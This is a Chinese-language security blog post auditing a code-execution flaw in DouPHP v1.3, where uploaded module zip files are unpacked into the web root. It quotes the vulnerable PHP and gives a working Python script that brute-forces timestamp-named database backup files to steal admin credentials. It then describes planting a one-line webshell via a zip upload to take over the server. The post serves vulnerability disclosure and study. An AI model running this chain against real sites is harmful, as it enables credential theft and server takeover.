【代码审计】DouPHP_v1.3代码执行漏洞分析

时间:2023-03-09 01:01:51
【代码审计】DouPHP_v1.3代码执行漏洞分析

 

0x00 环境准备

DouPHP官网:http://www.douco.com/

程序源码下载:http://down.douco.com/DouPHP_1.3_Release_20171002.rar

测试网站首页:

【代码审计】DouPHP_v1.3代码执行漏洞分析

0x01 代码分析

1、文件位置: /admin/module.php 第64-77行中:

  1. if ($rec == 'install') {
  2. // 判断是否有上传文件
  3. if ($_FILES['zipfile']['name'] == '') {
  4. $dou->dou_msg($_LANG['module_file_empty'], 'module.php?rec=local');
  5. else {
  6. $zipfile_name = preg_replace('/.zip/i', '', $_FILES['zipfile']['name']);
  7. }
  8. // CSRF防御令牌验证
  9. 10.     $firewall->check_token($_POST['token']);
  10. 11.
  11. 12.     if ($dou_upload->upload_image('zipfile', $zipfile_name))
  12. 13.         $dou->dou_header('cloud.php?rec=handle&type=module&mode=local&cloud_id=' . $zipfile_name);

14. }

这段函数中对上传的文件名进行判断,然后成功上传文件,跳转到cloud.php?rec=handle&type=module&mode=local&cloud_id=,跟进这个模块,看如何处理的

2、文件位置: /admin/cloud.php 第35-49行中,对上面获取的参数进行处理,调用handle函数,跟进去看看:

  1. if ($rec == 'handle') {
  2. $smarty->assign('ur_here', $_LANG['cloud_handle']);
  3. // 验证并获取合法的ID
  4. $cloud_id = $check->is_extend_id($_REQUEST['cloud_id']) ? $_REQUEST['cloud_id'] : '';
  5. $type = $_REQUEST['type'];
  6. $mode = $check->is_letter($_REQUEST['mode']) ? $_REQUEST['mode'] : '';
  7. $smarty->assign('type', $_LANG['cloud_' . $type]);
  8. 10.     $smarty->assign('cloud_id', $cloud_id);
  9. 11.     $smarty->assign('mode', $mode);
  10. 12.
  11. 13.     $smarty->display('cloud.htm');
  12. 14.     $GLOBALS['dou_cloud']->handle($type, $cloud_id, $mode);

15. }

3、文件位置/admin/include/cloud.class.php,第40-103行中,对handle函数进行部分摘录,前面几步STEP基本没问题,我们来看一下STEP4,调用了install函数,跟进去看看:

  1. function handle($type, $cloud_id, $mode = '') {
  2. // 基础数据
  3. $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 扩展压缩包
  4. $item_dir = $this->cache_dir . $cloud_id; // 扩展目录
  5. '''
  6. // STEP1 安装条件验证
  7. // STEP2 下载压缩包,如果是本地安装则直接显示正在解压缩
  8. // STEP3 解压缩
  9. ''''
  10. 10.        // STEP4 安装模块
  11. 11.        if ($wrong = $this->install($type, $cloud_id, $mode)) {
  12. 12.            $this->dou_flush($wrong);
  13. 13.            exit;
  14. 14.        } else {
  15. 15.            $text = $mode == 'update' ? $GLOBALS['_LANG']['cloud_update_0'] : $GLOBALS['_LANG']['cloud_install_0'];
  16. 16.            $success[] = $text . $cloud_id . $GLOBALS['_LANG']['cloud_install_1'];
  17. 17.            $success[] = $this->msg_success($type, $cloud_id);
  18. 18.
  19. 19.            $this->dou_flush($success);
  20. 20.        }
  21. 21.    }

4、文件位置/admin/include/cloud.class.php,第115-133行:

  1. function install($type, $cloud_id, $mode) {
  2. global $prefix;
  3. // 基础数据
  4. $item_zip = $this->cache_dir . $cloud_id . '.zip'; // 模块压缩包
  5. $item_dir = $this->cache_dir . $cloud_id; // 模块目录
  6. $sql_install = $this->root_dir . "data/backup/$cloud_id.sql"; // 安装用的SQL文件
  7. $sql_update = $this->root_dir . "data/backup/$cloud_id" . "_update.sql"; // 升级用的SQL文件
  8. 10.     // STEP1 拷贝模块文件
  9. 11.     if ($type == 'theme') {
  10. 12.         $this->dir_action($item_dir, $this->root_dir . 'theme/' . $cloud_id);
  11. 13.     } elseif ($type == 'mobile') {
  12. 14.         $this->dir_action($item_dir, $this->root_dir . M_PATH . '/theme/' . $cloud_id);
  13. 15.     } elseif ($type == 'plugin') {
  14. 16.         $this->dir_action($item_dir, $this->root_dir . 'include/plugin/' . $cloud_id);
  15. 17.     } else {
  16. 18.         $this->dir_action($item_dir, $this->root_dir);
  17. 19.     }

最后的安装模块过程中,首页就是拷贝模块文件,因$type=module,只能进入最后一个条件,也就是复制解压缩目录下的文件到网站根目录下,导致程序在实现上存在代码执行漏洞。

综上,对所上传的zip文件名只进行简单判断,然后解压缩、安装,当攻击者提供带入恶意代码的脚本,打包为zip文件上传,将被复制到网站根目录,通过该漏洞写入webshell,执行代码,控制服务器权限。

0x02 漏洞利用

A、        如何登陆后台

1、在DouPHP中备份功能代码摘录如下:

  1. // 根据时间生成备份文件名
  2. $file_name = 'D' . date('Ymd') . 'T' . date('His');
  3. $sql_file_name = $file_name . '.sql';

2、那么形成的文件名格式如:D20180118T101433.sql,而且URL访问并没有限制,备份目录是可以访问的,存在敏感信息泄露的风险。

假如管理员做了数据库备份,那么就可以爆破数据库备份文件获取敏感信息。

通过编写Python脚本来尝试爆破,附Python脚本如下:

  1. #! /usr/bin/env python
  2. # _*_  coding:utf-8 _*_
  3. import time
  4. import requests
  5. import threadpool
  6. date= "2018-01-18 10:00:00"
  7. datelist=[]

10. def gettime():

  1. 11.     timeArray = time.strptime(date,"%Y-%m-%d %H:%M:%S")
  2. 12.     time1= int(time.mktime(timeArray))
  3. 13.     time2=int(time.time())
  4. 14.     for i in range(time1,time2):
  5. 15.         time3= time.strftime('%Y%m%d %H%M%S', time.localtime(i))
  6. 16.         datelist.append(time3)
  7. 17.     return datelist

18. def req(str):

  1. 19.     try:
  2. 20.         str1,str2=str.split()
  3. 21.         date1="D"+str1+"T"+str2
  4. 22.         url="http://127.0.0.1/data/backup/"+date1+".sql"
  5. 23.         s=requests.get(url,timeout=5)
  6. 24.         if  s.status_code==200:
  7. 25.             print u"数据库备份文件爆破成功:"
  8. 26.             print url
  9. 27.
  10. 28.     except:
  11. 29.         pass
  12. 30.

31. if __name__ == '__main__':

  1. 32.     list=gettime()
  2. 33.     pool = threadpool.ThreadPool(1000)
  3. 34.     requ = threadpool.makeRequests(req,list)
  4. 35.     [pool.putRequest(req) for req in requ]
  5. 36.     pool.wait()
  6. 37.

3、测试截图:

【代码审计】DouPHP_v1.3代码执行漏洞分析

4、通过URL访问数据库备份文件,获取管理员账号密码。当然了,也可以尝试通过弱口令登录后台。

【代码审计】DouPHP_v1.3代码执行漏洞分析

B、代码执行漏洞利用

1、将一句话打包为zip文件,在安装本地模块,点击现在安装,即可成功上传,

【代码审计】DouPHP_v1.3代码执行漏洞分析

2、程序自动解压jian.zip到网站根目录下,生成jian.php

【代码审计】DouPHP_v1.3代码执行漏洞分析

3、通过菜刀连接,成功控制网站服务器

【代码审计】DouPHP_v1.3代码执行漏洞分析

0x03 修复建议

1、对上传的zip文件内容进行检测,对模块文件内容格式进行严格限制。

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

【代码审计】DouPHP_v1.3代码执行漏洞分析

相关文章